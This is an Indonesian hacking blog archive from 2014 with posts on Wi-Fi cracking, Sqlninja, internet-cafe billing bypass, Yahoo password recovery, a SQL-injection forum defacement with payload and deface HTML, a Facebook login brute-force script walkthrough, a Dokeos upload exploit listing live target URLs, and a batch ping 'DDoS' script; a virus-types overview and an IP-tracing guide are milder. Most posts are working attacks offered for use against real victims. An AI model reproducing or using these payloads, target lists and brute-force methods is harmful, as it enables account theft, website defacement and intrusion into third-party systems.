Jam

Tampilkan postingan dengan label Hacking. Tampilkan semua postingan
Tampilkan postingan dengan label Hacking. Tampilkan semua postingan

Rabu, 03 September 2014

Download Aplikasi Hack WIFI WPA Insya Allah 100% work




Cara menggunakannya:
1.Download aplikasinya di sini
2.ekstrak file winrarnya
3.jalankan aplikasinya
4.Pilih Jaringannya
5.Pilih metode penyerangannya
6.Pilih deskripsi jaringannya dan hubungkan
7.Enjoyy

Download hacking Tools Anonymous 

Rabu, 25 Juni 2014

Download Sqlninja 0.2.6



Fitur:
+ +Sidik Jari dari SQL Server jarak jauh (versi, pengguna melakukan query, hak pengguna, ketersediaan xp_cmdshell, modus otentikasi DB)
+ + Bruteforce password 'sa' (dalam 2 rasa: kamus berbasis dan inkremental).
+ + Penciptaan xp_cmdshell kustom jika yang asli telah dihapus
+ + Upload dari netcat (atau executable lain) dengan hanya menggunakan HTTP permintaan yang normal (tidak ada FTP / TFTP diperlukan).
+ + TCP / UDP portscan dari SQL Server sasaran ke mesin menyerang, dalam rangka
untuk menemukan sebuah port yang diijinkan oleh firewall dari jaringan target
dan menggunakannya untuk reverse shell.
+ + Bindshell langsung dan sebaliknya, baik TCP dan UDP
+ + ICMP-terowongan shell, saat tidak ada TCP / UDP port yang tersedia untuk langsung / terbalik
shell tapi DB bisa ping komputer anda.
+ + DNS-terowongan pseudo-shell, saat tidak ada TCP / UDP port yang tersedia untuk
shell langsung / mundur, namun server DB dapat mengatasi eksternal hostname
(cek dokumentasi untuk rincian tentang bagaimana ini bekerja).
+ + Teknik Evasion> membingungkan beberapa IDS / IPS / WAF.
+ + Integrasi dengan Metasploit3, untuk mendapatkan akses grafis untuk DB terpencil server melalui suntikan VNC server.

Jika kalian ingin mendownload Aplikasi tersebut silakan klik tulisan dibawah ini:
Ukuran : 443 KB
Download

Rabu, 18 Juni 2014

Free Download Wireshark Terbaru (Update 13 Juni 2014)

wireshark
Wireshark adalah Software network packet analyzer.Disebut juga dengan protocol analysis tool atau packet sniffer.Wireshark biasa digunakan untuk mengatasi permasalahan jaringan, analisis, dan pengembangan software

Wireshark merupakan salah satu dari sekian banyak tool Network Analyzer yang banyak digunakan oleh Network administrator untuk menganalisa kinerja jaringannya terrmasuk protokol didalamnya. Wireshark banyak disukai karena interfacenya yang menggunakan Graphical User Interface (GUI) atau tampilan grafis dan software ini bersifat open source.
Beberapa Fungsi & Fitur Wireshark :
*Wireshark memungkinkan user untuk mengenali berbagai macam protocol jaringan.
*Wireshark dipakai oleh network administrator untuk menganalisa kinerja jaringannya.
*Wireshark dapat membaca data secara langsung dari Ethernet, Token Ring, FDDI, serial (PPP dan SLIP), 802.111 wireless LAN dan koneksi ATM serta dapat digunakan untuk menganalisa transmisi paket data dalam jaringan, proses koneksi dan transmisi data antar komputer/laptop.
*Wireshark digunakan untuk menangkap paket data, memfilter, dan menganalisa data adapter jaringan. Khususnya digunakan untuk memeriksa data apa yang sedang dikirim ke dan dari computer kita. Jika ada aktivitas aneh yang terjadi pada jaringan wireshark akan mendeteksinya.
*Wireshark juga dapat digunakan untuk debugging software yang bekerja pada sistem jaringan.
File Size: 21.12 MB
Publisher: Wireshark Foundation
OS Support: Windows 2000/XP/2003/Vista/7/8

Minggu, 18 Mei 2014

Daftar target SQL-Injection

hahaha dari judulnya aja udah buat ane ngekek broo haha , tapi ini serius :D di sini kalian bisa latihan sqlmap ngepet dikit-dikit bro buat latihan aja klw mau ngambilin duit ya terserah lu aja hehehe buat ngunain sqlmap pelajari disini oke lanjut yee , ouhh yaa bukan cuma sqlmap yang bisa havij juga bisa kok pelajari disini oke mari di nikmati aja daftar nya yaak :D


  1. target
  2. target
  3. target
  4. target
  5. target
  6. target
  7. target
  8. target
  9. target
  10. target
  11. terget
  12. terget
  13. terget
  14. terget
  15. terget
  16. target
  17. target
  18. target
  19. target

DI HARAPKAN MENGGUNAKAN PROXY !!!

 

sumber: http://invisible-404.blogspot.com/

Mengenal virus komputer

Penjelasan mengenahi virus komputer sangat banyak sekali , dan bermacam-macam jenisnya , ada beberapa hal yang perlu di perhatikan dari virus-virus ini ! jika kalian memiliki perusahaan yang sangat bernama dan sangat banyak pesaingnya maka siap-siap devloper virus tidak akan segan-segan menciptakan virus untuk perusahaan anda dan menjual kepada pesaing anda untuk meruntuhkan anda alias data-data akan musnah dan lenyab !!!

semakin lama dan semakin berkembangnya technology ini virus juga ikut mengambil andil dalam perkembangan technology , contohnya dulunya virus komputer yang hanya bisa menyembunyikan dirinya dan file-file penting sehingga pemilik data kebingungan dan mengiranya data tersebut telah terhapus , kali ini virus banyak sekali yang melebihi system komputer itu sendiri ! dan virus tersebut terlahir dari rahim yang ngak jelas hahaha , alias banyak sekali valianya , ada yang terbut dari PHP berupa shell untuk website , ada C , C++ , Java Script , Assambly

Ada berbagai jenis virus yang dapat diklasifikasikan menurut asal mereka, teknik, jenis file yang mereka infeksi, di mana mereka bersembunyi, jenis kerusakan, jenis sistem operasi. Berikut ini berbagai jenis virus komputer beserta penjelasannya .

1. Memory Resident Virus

Virus ini menetapkan dalam memori komputer dan otomatis aktif setiap kali OS berjalan dan menginfeksi semua file yang dibuka.

- Persembunyian: Jenis virus ini bersembunyi dalam RAM dan tinggal di sana bahkan setelah kode berbahaya dijalankan. Virus mendapat kontrol atas memori sistem dan mengalokasikan blok memori di mana ia menjalankan kode sendiri, dan mengeksekusi kode ketika fungsi apapun dijalankan.

- Target: Dapat merusak file dan program yang dibuka, ditutup, disalin, diubah namanya, dll.

- Contoh: Randex, CMJ, Meve, dan MrKlunky.

- Proteksi: Instal program antivirus

2. Direct Action Viruses

Tujuan utama virus ini adalah untuk meniru dan bertindak ketika dijalankan. Ketika kondisi tertentu terpenuhi, virus akan beraksi dan menginfeksi file dalam direktori atau folder yang ditentukan dalam path file AUTOEXEC.BAT. File batch ini selalu terletak di direktori root hard disk dan melakukan operasi tertentu ketika komputer boot.

Teknik FindFirst / FindNext digunakan di mana kode memilih beberapa file sebagai korbannya. Hal ini juga menginfeksi perangkat eksternal seperti pen drive atau hard disk.

- Persembunyian: Virus terus berpindahlokasi  ke file baru setiap kali kode dijalankan, tapi umumnya ditemukan di direktori root pada hard disk.

- Target: Virus ini dapat merusak file. Pada dasarnya, ini adalah file virus-infector.

- Contoh: Vienna virus

- Proteksi: Instal scanner antivirus.


3. Overwrite Viruses

Virus jenis ini menghapus informasi dalam file yang terinfeksi.

- Persembunyian: Virus menggantikan isi file. Namun, tidak mengubah ukuran file.

- Contoh: Way, Trj.Reboot, Trivial.88.D

- Proteksi: Satu-satunya cara untuk membersihkan file yang terinfeksi oleh virus Overwrite adalah dengan menghapus file yang terinfeksi.

4. Boot Sector Virus

Jenis virus ini mempengaruhi sektor boot dari sebuah hard disk. Ini adalah bagian penting dari disk, di mana informasi dari disk itu sendiri disimpan bersama dengan sebuah program yang memungkinkan untuk boot (mulai) . Virus jenis ini juga disebut Master Boot Sector Virus or Master Boot Record Virus.

- Persembunyian: Virus ini bersembunyi di dalam memori hingga DOS mengakses floppy disk, Dan ke manapun data yang boot akses, virus menginfeksi itu.

- Contoh: Polyboot.B, AntiEXE

- Proteksi: Cara terbaik untuk menghindari virus boot sector adalah untuk memastikan floppy disk di write protect.


5. Macro Virus

Macro virus menginfeksi file yang dibuat menggunakan aplikasi atau program tertentu yang berisi macro, seperti doc, Xls, Pps, Mdb, dll. Virus ini otomatis menginfeksi file yang berisi macro, dan juga menginfeksi template dan dokumen. Hal ini disebut juga sebagai jenis virus e-mail.

- Persembunyian: Bersembunyi dalam dokumen yang dibagi melalui e-mail atau jaringan.

- Contoh:Relax, Melissa.A, Bablas, O97M/Y2K

- Proteksi: Teknik perlindungan terbaik adalah  menghindari membuka e-mail dari pengirim yang tidak dikenal. Juga, menonaktifkan macro dapat membantu melindungi data.

6. Directory Virus
Direktori virus (juga disebut Cluster Virus / File System Virus) menginfeksi direktori komputer  dengan mengubah jalan yang menunjukkan lokasi file. Ketika menjalankan program file dengan ekstensi EXE. Atau COM. Yang telah terinfeksi oleh virus, Anda tidak sadar menjalankan program virus, sedangkan file asli dan program sebelumnya dipindahkan oleh virus. Setelah terinfeksi, menjadi mustahil untuk menemukan file asli.

- Persembunyian: Virus ini biasanya terletak dalam satu lokasi disk, tetapi menginfeksi seluruh program dalam direktori.

- Contoh: virus Dir-2

- Proteksi: instal ulang semua file yang terinfeksi setelah memformat disk.

7. Polymorphic Virus

Virus polimorfik mengenkripsi atau menyandikan diri dengan cara yang berbeda (menggunakan algoritma yang berbeda dan kunci enkripsi) setiap kali mereka menginfeksi sistem.

- Contoh: Elkern, Marburg, Setan Bug, dan Tuareg

- Proteksi: Instal antivirus high-end.

8. Companion Viruses

- Persembunyian: umumnya menggunakan nama file yang sama dan membuat ekstensi yang berbeda. Sebagai contoh: Jika ada file "Me.exe", virus membuat file lain bernama "Me.com" dan bersembunyi di file baru. Ketika sistem memanggil nama file "Me", yang ". Com" file dijalankan (sebagai ". Com" memiliki prioritas lebih tinggi daripada "exe."), Sehingga menginfeksi sistem.

- Contoh: Stator, Asimov.1539 dan Terrax.1069

- Proteksi: Instal scanner antivirus dan juga men-download Firewall.

9. FAT Virus

File allocation table (FAT) adalah bagian dari disk yang digunakan untuk menyimpan semua informasi mengenai lokasi file, ruang yang tersedia, ruang tidak dapat digunakan, dll

- Persembunyian: virus FAT menyerang bagian FAT dan dapat merusak informasi penting. Hal ini bisa sangat berbahaya karena mencegah akses ke bagian tertentu dari disk dimana file penting disimpan. Kerusakan yang disebabkan dapat mengakibatkan hilangnya informasi dari file individual atau bahkan seluruh direktori.

- Contoh: link Virus

- Proteksi: Sebelum serangan virus menyebar ke semua file di komputer, car semua file yang benar-benar diperlukan pada hard drive, dan hapus yang yang tidak diperlukan. Mereka mungkin file yang dibuat oleh virus.

10. Multipartite Virus

Virus ini menyebar dalam berbagai cara tergantung pada sistem operasi yang terpasang dan adanya file tertentu.

- Persembunyian: Pada tahap awal, virus ini cenderung bersembunyi di dalam memori kemudian menginfeksi hard disk.

- Contoh: Invader, Flip dan Tequila

- Proteksi: Bersihkan sektor boot dan juga disk untuk menyingkirkan virus, dan kemudian kembalikan semua data di dalamnya. Namun, pastikan bahwa data  bersih.

11. Web Scripting Virus

Banyak halaman web mengunakan kode yang kompleks dalam rangka menciptakan konten yang menarik dan interaktif. Kode ini sering dimanfaatkan untuk  tindakan yang tidak diinginkan.

- Persembunyian: Sumber utama scripting virus web browser atau halaman web yang terinfeksi.

- Contoh: JS.Fortnight adalah virus berbahaya yang menyebar melalui e-mail.

- Proteksi: Instal aplikasi microsoft tool yang merupakan fitur standar pada Windows 2000, Windows 7 dan Vista. Scan komputer dengan aplikasi ini.

12. Worms

Worm adalah program yang sangat mirip dengan virus, memiliki kemampuan untuk mereplikasi diri dan dapat menyebabkan efek negatif pada sistem . Tapi mereka dapat dideteksi dan dihilangkan dengan perangkat lunak antivirus.

- Persembunyian: umumnya ini menyebar melalui e-mail dan jaringan. Mereka tidak menginfeksi file atau merusak mereka, tetapi mereka meniru begitu cepat sehingga seluruh jaringan akan runtuh.

- Contoh: PSWBugbear.B, Lovgate.F, Trile.C, Sobig.D, Mapson

- Proteksi: Instal antivirus versi terbaru.

13. Trojans


Trojan atau Trojan horse adalah kode berbahaya , yang tidak seperti virus, tidak mereproduksi dengan menginfeksi file lainnya, juga tidak mereplikasi diri seperti cacing. Program ini menyamar dirinya sebagai program atau aplikasi yang berguna.

Selain itu, ada banyak virus komputer lain yang memiliki potensi untuk menginfeksi data. Oleh karena itu, lindungi komputer kamu dengan menginstal perangkat lunak antivirus yang berkualitas tinggi dan asli. Selain itu jangan mendownload file di sebarang situs download gratis.

Melacak IP address !

Melacak IP Trojan atau attacker !

Kali ini saya akan sharing sedikit hal yang aslinya ane mau sharing deteksi trojan tanpa anti_virus hmmmm berubah pikiran akhirnya ane berfikir kembali dan kemudian ada seseorang chet dan menanyakan bagaimana cara melacak sebuah IP address ? Ini bisa di mungkinkan Trojan atau hacker yang sedang menjelajahi file-file di server kalian atau PC kalian !
Banyak sekali Server Perusahaan istansi yang terkena trojan atau shell yang udah tahunan tidak terdeteksi dan masih bisa di eksekusi di indonesia ini ! Nah kali ini hanya sedikit saja pembahasanya yang akan di jelaskan di tulisan ini semoga membantu

pertama kalian matikan PC atau laptop kalian , kemudian nyalakan kembali PC atau laptop kalian , jika kalian menggunakan LINUX beruntunglah kalian karna sama dengan yang ane gunakan hehehe kan biar pas gitu ngak bingung tapi sama aja kok caranya :D , oke buka terminal kalian bagi pengguna LINUX dan buka CMD kalian bagi pengguna Windows , setelah kalian melihat layar hitam dan tulisan di terminal (tanpa membuka browser dan Applikasi apapun yang terkoneksi ke internet) ketikan “netstat -an | grep TCP” perintah di atas akan menampilkan komunikasi PC atau laptop kalian yang sedang terjadi , jika kalian baru pertama membuka laptop atau PC kalian dan tidak melakukan aktivitas internet akan tetapi jaringan sudah menyambung ke internet maka yang akan kalian lihat dari perintah “netstat -an | grep TCP” seperti gambar berikut


nah kalian akan melihat beberapa IP address yang berkomunikasi dengan kalian salah satunya IP dari provider kalian , dan tunggu beberapa lama kemudian setelah kalian melakukan browsing dengan google chrome atau mozilla atau yang lainya ulangi perintah “netstat -an | grep tcp” dan lihat hasilnya akan lebih banyak dari hasil sebelumnya , nah dari sini kalian ambil satu IP yang akan kalian lacak milik siapakah IP tersebut !



Buka browser kalian dan masuk ke website bgp.he.net http://bgp.he.net/ pastekan IP yang kalian curigai di hurricen electrik ini “BGP” dan lihat hasil nya


di situ tertulis IP tersebut milik provider mana dan kalian tinggal menggunakan google untuk menggali informasi dari info yang kalian dapatkan seperti nama provider ? Dan ip nya pastekan aja ke google dan lihat hasilnya :D


tertangkap ! Tinggal kalian menghubungi PROVIDER nya , biasanya ini cara polisi untuk berpacaran dengan hacker hahahaha , oke semoga bisa membantu ya temen-temen , ketemu lagi besok dengan judul “mendeteksi trojan tanpa anti_virus” byee selamat belajar oke

Kamis, 03 April 2014

Cara Menghack Billing Explorer | Nge-Net Gratis

Cara Menghack Billing Explorer | Nge-Net Gratis
Cara menggunakan:


  1. Setelah Download, Buka Billing Explorer Hack
  2. Klik kanan pada Penangkal .inf kemudian klik install. File ini digunakan untuk meng-enablekan Task Manager, Run, CMD, dan Registry Editor (Regedit).
  3. Karena CMD sudah bisa diakses, Buka CMD kemudian ketik net view, kemudian akan muncul komputer-komputer yang terhubung dengan jaringan LAN di warnet tersebut.
  4. Cari yang kira – kira komputer tersebut adalah komputer server (biasanya pake nama BILLINGSERVER, pokonya ada tulisan admin , administrator , billing, Dll )
  5. Kemudian ketik ping nama_komputer_server (contoh : ping CYBERNETBILLING)
  6. Catat IP Address adminnya Itu
  7. Jalankan program Billing Hack 2.exe yang sudah diekstrak dari BillingExplorerHack.zip tadi.
  8. Pilih single client atau all client, single client untuk meng-gratiskan komputer tertentu saja, all client untuk menggartiskan semua komputer, saya saranin pake yang single client aja,
  9. Ketik IP Address admin tadi, pake port 1500, trus tekan Hack now
  10.  Anda Telah Menghack Billing Explorer

Gunakan software ini dengan bijak. Penggunaan software ini diluar tanggung jawab WIEPRA17.BLOGSPOT.COM....!!!!

Selasa, 01 April 2014

CARA MEMBOBOL YAHOO

CARA HACK YAHOO DENGAN SOFTWARE YAHOO PASSWORD DECRYPTOR

Anda tidak perlu kuwatir jika password anda hilang atau lupa disini saya menyediakan software untuk memunculkan lagi. Tetapi ini beresiko karena software ini bisa membuka password oranglain jadi saya sarankan untuk tidak melakukan tidak kriminal.
Silahkan Download disini:DOWNLOADsetelah download ikuti langkah-langkahnya
Langkah pertama:
1.Buka yahoopasswordDecryptor
2.Klik start recovery
3.maka akan muncul username dan password
4.klik show password untuk melihat password

Senin, 03 Februari 2014

Cara Deface Website Forum Sederhana Untuk Newbie


1). Pertama Ketik di google

inurl:/forums.asp?iFor=

2). Pilih target, Contoh target

3). Hapus angka dibelakang = Hingga menjadi seperti ini

4). Setelah itu = masukan SQL inject
12+union+select+1,2,3,u_password,5,u_id,7,8,9,10,11,12+from+users

5). Hingga menjadi seperti ini

Tulisan yang berderet di bawah nama 10 TOPICS itu adalah username
Tulisan yang berderet di bawah nama DATED itu adalah passwordnya

6). Cari Username Admin & Passwordnya.

Ok, pada web target yang jadi bahan tutor ini, saya menemukan username & password.
[-] Username : admin
[-] Password : default

7). Sekarang klik tulisan login yang berada diatas.
Nah... login udah berhasil
Sekarang jika ingin melakukan defacing, klik tulisan "POST NEW TOPICS"

8). Isi Subjectnya...
Contoh : HACKED BY BLA BLA BLA
lalu masukin script deface HTMLnya ke kolom dibawah subject.


<div align=center><DIV id=layer1 style="border-right: #000000 1px; border-top: #000000 1px; z-index: 1; left: 0px; border-left: black 1px; width: 1350px; border-bottom: black 1px; position: absolute; top: 0px; height: 698px; background-color: black; layer-background-color: black"><center> <br><b><font face="papyrus" color="red" size="5">Hacked By Cirebon-Cyber4rt</font></h2><br><br><img src="http://i1121.photobucket.com/albums/l513/iqbalkanci/images8.jpg"><br><br> <font face="papyrus" color="green" size="4">Thanks To: Hacker Newbie Community | YogyaCarderLink | DevilzCode | Indonesian BlackHat | etc</a><br> <br><font color="red" size="3">Wkwkwkwk </div>

Kode diatas bisa diubah sesuai keinginan sobat.
Trus klik tombol post...
Ok, HTML deface'an sobat udah masuk... sekarang klik judul postingan yang sobat tulis di subject tadi.

Kamis, 23 Januari 2014

Bruteforce Facebook Login with Python Script

Hi friend,
So, here I’m gonna continue my previous post about how to get someone’s Facebook login password. There are lot of techniques on how to steal someone’s Facebook password, such as stealing cookies, phising page, stealing email’s password, bruteforce Facebook login, social engineering, “unknown” hack trick, etc. In this post, I’m gonna share with you on how to get Facebook password with “bruteforce Facebook login” technique. And we’re gonna use Python script for this.
Step by step:
1. Prepare the Python compiler. If you don’t have Python installed on your computer, you can download the Python installer here:
(For Windows – 32/64 bit machine)
http://www.python.org/getit
(For Linux user – which don’t have Python 2.7.xxx and later): just google around for the installation procedures according to your Linux distribution.
eg:
(for Centos 6), follow here: http://toomuchdata.com/2012/06/25/how-to-install-python-2-7-3-on-centos-6-2
2. After installing the Python compiler, you can then check the Python installation and its version on the command line. Note, in Windows, you can open up command terminal (cmd) or install Cygwin to get a view looks like on Linux terminal.
In this tutorial, I’m using Cygwin in Windows.
(Linux terminal)
$ python -v
(Cygwin)
$ python --version
3. I found this Bruteforce Python script on the net, and it needs for Mechanize module.
- In Windows, you may have to download the Mechanize module package through the Python installer.
- While in Linux, you can install the Mechanize module with this command:
$ easy_install Mechanize
4. If everything has been setup. Now it’s time to run the script.
# Overview of the Bruteforce Python Script
1. I found the script on the net and got this link:
# Original script
http://pastebin.com/e49Db5BF (This is the original Python script, if you want to download the fixed script, please download from the below link)
# Fixed Script
http://q.gs/3475036/download-fixed—facebook-bruteforce-pyt
2. Create password file, pass.txt contains:
password1
password2
password3
password4
3. Trying to run the script for the first time, here what it appears:
Running the original script for the first time
4. Run the script based on the usage options:
$ python original-fbbruteforce.py -u test@yahoo.com -w pass.txt
And here what it appears:
Run the script based on the Usage Options
Looks like the script doesn’t run as what it says in the usage options.
5. I checked in the script, and found that there’s a line which reads the pass.txt file and random the string line by line. It seems that the script didn’t pass for the Username (-u) argument value inputted from the terminal.
def bruteforce(word):
try:
#sys.stdout.write("\r[*] Trying %s... " % word)
pos = word.find("::")
username = word[0:pos]
word = word[pos+len("::"):len(word)]
Looks like the script line trying to look for any “::” character. In the pass.txt file, there’s no “::”, but the script keeps random it away.
6. Okay, so I tried to run the command based on what the script line above wants to with this command:
$ python original-fbbruteforce.py -w pass.txt
But, first I have to change the pass.txt content with this:
test@yahoo.com::password1
test@yahoo.com::password2
test@yahoo.com::password3
test@yahoo.com::password4
So that the script line above will get the exact character it wants “::” and use it to implode the string line by line. First implode result will be the “Username/UserEmail” and second will be the “Password“.
And here what it appears:
Run the script with only -w argument
Okay, finally the right command to run the script is:
$ python original-fbbruteforce.py -w pass.txt
7. I tried to create a new Facebook account and use it for testing purpose on this script. The file pass.txt now contains:
test@yahoo.com::password1
test@yahoo.com::password2
michaelantonio777@yahoo.com::MyP4sSw0rD
test@yahoo.com::password3
test@yahoo.com::password4
Let us see the result:
Trying to run the script with valid Facebook account login, but it fails.
Looks like the script doesn’t work well. Why? When it comes to submit login for account with the Username: michaelantonio777@yahoo.com and password: MyP4sSw0rD, it should logging in successfully, but it didn’t.
I tried several hours to learn the script code deeply and found several issues, such as:
a. Like I said above, that this script doesn’t read the pass.txt file like what it expected to. And also the “-u” argument not read by the script. Whatever “-u” argument value we fill in the command, still the script won’t read it, the script just read what contains in pass.txt file.
b. If you ever found that this script really works, once the script successfully logged in with certain account, it then terminates the bruteforce looping process. In our case, what we want is the script should continues to loop for the bruteforce looping till the end of the line (in pass.txt file). Imagine how the script will just stopped working when it comes in 2nd line, but the pass.txt file still has thousands of account line to bruteforce. Wouldn’t it be nice if the script just doing the bruteforce process automatically(?).
c. The script got problem when it encounters a “Facebook security checkpoint page” or the password being submitted is an old password.
So, to solve those issues above, I tried to fix the script by doing these things:
a. First issue, I’m not going to fix on how the script passed the the arguments value.
b. Second issue, process termination relates with how it loops line by line and read the forms found on Facebook page. What I’m talking about is about cookies and session. The script uses cookielib.LWPCookieJar() class in Python. It’s intended to save the cookies captured from opening website URL link. So, once the script successfully logging in a certain account, then the cookielib class will save the cookies & session data of that account.
And what next? Take a look at this line:
if success in response:
print "\n\n[*] Logging in success..."
print "[*] Username : %s" % (username)
print "[*] Password : %s\n" % (word)
file.write("\n[*] Logging in success...")
file.write("\n[*] Username : %s" % (username))
file.write("\n[*] Password : %s\n\n" % (word))
sys.exit(1)
There’s a “sys.exit(1)” line, means it will terminate the looping process. To avoid being terminated, this line should be removed.
But, even if we have removed the “sys.exit()” line, still the cookies & session saved for the next POST submit. And ofcourse, there will raise a problem. What is it? Look at this line:
opensite = br.open(fblogin)
br.select_form(nr=0)
br.form['email'] = username
br.form['pass'] = word
br.submit()
The second line above, “br.select_form(nr=0)” trying to find and select for “Login Form” for the next POST submit, but since there’s a “successful login cookies” saved from the previous process, ofcourse it will raise error message that the “Form is not found” generated by this exception line:
except mechanize._mechanize.FormNotFoundError:
print "\n[*] Facebook changing their system, please report bug at yudha.gunslinger@gmail.com\n"
file.write("\n[*] Facebook changing their system, please report bug at yudha.gunslinger@gmail.com\n")
sys.exit(1)
In real example, you can check by yourself, try to login to Facebook with your account, and see whether there’s any “Login Form” or not. Ofcourse you would’t find it, because you are already logged in.
So, how to solve this? There are several ways to solve this issue:
1. By adding “CookieJar.clear_session_cookies()” to clear all the cookies and session. But, this is not recommended, because even it clears all the cookies and sessions, it is similar to “closing” the “simulate browser”, means closing/terminate the script also. So, this would not solve the problem.
2. By finding the “Log Out” form and submit it. This will simulate for logging out process, and clear the cookies and session. And the script will continue the bruteforce looping and get the “Log In” form to submit for the next account.
c. Third issue, the script can not handle if the successful login encounters with “Facebook security checkpoint” page and “submitted password is an old password” page or the login attempts encounter error for several times.
In real example, try to login with your account, but with incorrect password (not your real password). After first failed login attempt, you should be redirected to an error login page which it contains a somekind of Login Form, but the Username/UserEmail has been auto-filled/auto-complete by the Facebook. Again, this will raise an error, that is “Control not Found”, generated by this exception line:
except mechanize._form.ControlNotFoundError:
print "\n[*] Facebook changing their system, please report bug at yudha.gunslinger@gmail.com\n"
file.write("\n[*] Facebook changing their system, please report bug at yudha.gunslinger@gmail.com\n")
sys.exit(1)
What does it mean by “Control Not Found“? It means that the script could not find for the “Email” field Control in the Login Form. Why? Because there has already an auto-filled/auto-complete for the Email account, and the form element doesn’t contain it (for the next POST SUBMIT).
So what can we do to solve this problem? We should force the page to release the auto-filled/auto-complete “Email” field by simulating a “click” or submit to link which contains string like “notme.php“. By forcing to click this “Not Me” link, it will then load for the Facebook login page and the script can find for the “Email” and “password” Control field successfully.
Conclusion, the main idea for Facebook bruteforce is keeping the script to always open this page :
"https://login.facebook.com/login.php?login_attempt=1"
# Download the Fixed Script
I have fixed the script by adding several codes in it, especially in handling the form submit, and the script works well in many test-cases.
Test case examples:
1. Test Case 1
File pass.txt contains:
test@yahoo.com::password1
test@yahoo.com::password2
michaelantonio777@yahoo.com::MyP4sSw0rD
test@yahoo.com::password3
test@yahoo.com::password4
$ python fixed-fbbruteforce.py -w pass.txt
Test Case 1 – Script works good
2. Test Case 2
Let’s see how the “Log Out” click simulation works. File pass.txt contains:
test@yahoo.com::password1
test@yahoo.com::password2
michaelantonio777@yahoo.com::MyP4sSw0rD
juliawoods880@yahoo.com::Th3P4s5W0rd
test@yahoo.com::password3
test@yahoo.com::password4
$ python fixed-fbbruteforce.py -w pass.txt
Test Case 2 – Script works good, for Login – Logout simulation
3. Test Case 3
Test the script to bruteforce 5000 reserved accounts, along with its password (dumped from certain website).
$ python fixed-fbbruteforce.py -w pass.txt
Run script on VPS with 5000 accounts to bruteforce
In bruteforcing process, found 2 successful logins
and many test cases I can not post all here, like “security checkpoint page“, “the password is an old password“, “Not Me Trapped“, etc. But, as you run this script many times with different accounts to bruteforce, you will find out by yourself.
You can view/download the fixed Facebook bruteforce Python script here:
http://q.gs/3475036/download-fixed—facebook-bruteforce-pyt
Note:
- I have added some commented lines for the clear explanation and in case you need to trace the script output, especially on cookies data, form elements, forms list, the link where it goes after GET/POST submit, User Agent used, etc.
- I recommend you to use VPS (Virtual Private Server) to gain max speed when bruteforcing
- You can compare the script line between the original script and the fixed script one.
- Keep in mind, pass.txt file should contains format like this:
userEmail::password
(we can login in Facebook using either User Email or UserName).
https://www.facebook.com/michael.antonio
michael.antonio” is the UserName.
- To run the bruteforce process in background, use this command:
$ nohup nice -n 3 python2.7 fixed-fbbruteforce.py -w pass.txt 1>/[dir]/logs.txt &
or
$ nohup nice -n 3 python fixed-fbbruteforce.py -w pass.txt 1>/[dir]/logs.txt &
Enjoy your bruteforcing .. please comment if you find any error. Thank you.

Jumat, 17 Januari 2014

Deface: Portal Dokeos Upload Vulnerability


Hacker.jpg

Portail Dokeos vulnerability merupakan bugs upload file yang hampir mirip dengan FCK editor karena sama-sama bisa kita gunakan untuk upload file deface/shell. Oke deh langsung aja kita mulai langkah langkahnya, seperti biasa kita googling dulu target kita pake dork dibawah ini:






Name: Portal Dokeos Upload File Vulnerability
Dork: “Portail Dokeos 1.8.5″

Exploit: http://target.com/patch/main/inc/lib/fckeditor/editor/filemanager/upload/test.html


Udah siap semua kan langsung kita ke tkp target kita. Jika sudah masuk ke halaman upload dari web target kita ganti dulu pada ‘Select the “File Uploader” to use:’ dari asp kita ubah jadi php. Kalo udah kita langsung upload aja deh itu file deface/shell favorit kita.


Contoh live target :
http://campus.flone.be/main/inc/lib/fckeditor/editor/filemanager/upload/test.html
http://ns5.freeheberg.com/~dispensa/main/inc/lib/fckeditor/editor/filemanager/upload/test.html
http://www.dokeos.nrc-gauthey.fr/main/inc/lib/fckeditor/editor/filemanager/upload/test.html
http://www.ladapt-hn.com/main/inc/lib/fckeditor/editor/filemanager/upload/test.html
http://my.eurasiam.com/main/inc/lib/fckeditor/editor/filemanager/upload/test.html
http://el.technifutur.be/main/inc/lib/fckeditor/editor/filemanager/upload/test.html
http://www.formation.megalodon.fr/main/inc/lib/fckeditor/editor/filemanager/upload/test.html
http://www.pharmconseil-elearning.com/main/inc/lib/fckeditor/editor/filemanager/upload/test.html
http://pro.accru.info/main/inc/lib/fckeditor/editor/filemanager/upload/test.html
http://www.formation-microkine.fr/main/inc/lib/fckeditor/editor/filemanager/upload/test.html
http://foad.ina.fr/main/inc/lib/fckeditor/editor/filemanager/upload/test.html
http://campus.technifutur.be/main/inc/lib/fckeditor/editor/filemanager/upload/test.html
http://www.fpafoad22.fr/main/inc/lib/fckeditor/editor/filemanager/upload/test.html
http://www.ecoleprimaireenligne.fr/main/inc/lib/fckeditor/editor/filemanager/upload/test.html
http://campus.flone.be/main/inc/lib/fckeditor/editor/filemanager/upload/test.html
http://www.elearning80.fr/main/inc/lib/fckeditor/editor/filemanager/upload/test.html


Setelah berhasil kita upload, kita bisa lihat file upload file deface kita pake url berikut ini:
http://target.com/patch/main/upload/nama_file_anda


Oke deh sekian dulu tutor kali ini, selamat malam dan selamat mencoba proxy?url=http%3A%2F%2Fs0.wp.com%2Fwp-in

Rabu, 08 Januari 2014

Cara Membuat Tool Hacker Sederhana Sendiri - Ddos Attack | Hacker

apa itu Ddos Attack adalah jenis serangan terhadap sebuah komputer atau server di dalam jaringan internet dengan cara menhabiskan sumber ( resource ) yang di miliki oleh komputer tersebut. sampai komputer tersebut tidak dapat menjalankan fungsinya dengan benar, sehingga secara tidak langsung mencegah pengguna lain untu memperoleh akses layanan dari komputer yang di serang tersebut..

uda dulu ahg penjelasan tentang Ddos Attack nya..
langsung saja kita ke cara pembuatan Ddos Attack..

yang perlu di persiapkan adalah :
1. PC / Laptop
2. Programe Notepade. ( sudah ada dalam windows kita semua )

cara membuat nya adalah :
1. buka notepade sobat semua..
2. copy code script di bawah ini kedalam notepade sobat.
ingat : jangan mengganti script di bawah ini 

@echo off
mode 67,16
title DDOS Attacking Server
color 0c
cls
echo ==================================
echo =          Hacking Tools         =
echo ==================================
echo.
echo ++++++++++++++++++++++++++++++++++
echo + Name : DDOS Attacking Server   +
echo + Author : RezaTkc            +
echo + Visite : rezatkc.blogspot.com +
echo ++++++++++++++++++++++++++++++++++
echo.
goto Next
echo.
echo DDOS With Batchfile
echo.
set /p x=Server-Target:
echo.
ping %x%
@ping.exe 127.0.0.1 -n 5 -w 1000 > nul
goto Next
:Next
echo.
echo **********************************
echo *    Masukan IP / Host Target    *
echo **********************************
echo.
set /p m=ip Host:
echo.
set /p n=Packet Size:
echo.
biggrinDOS
color 0b
echo Attacking Server %m%
ping %m% -i %n% -t >nul
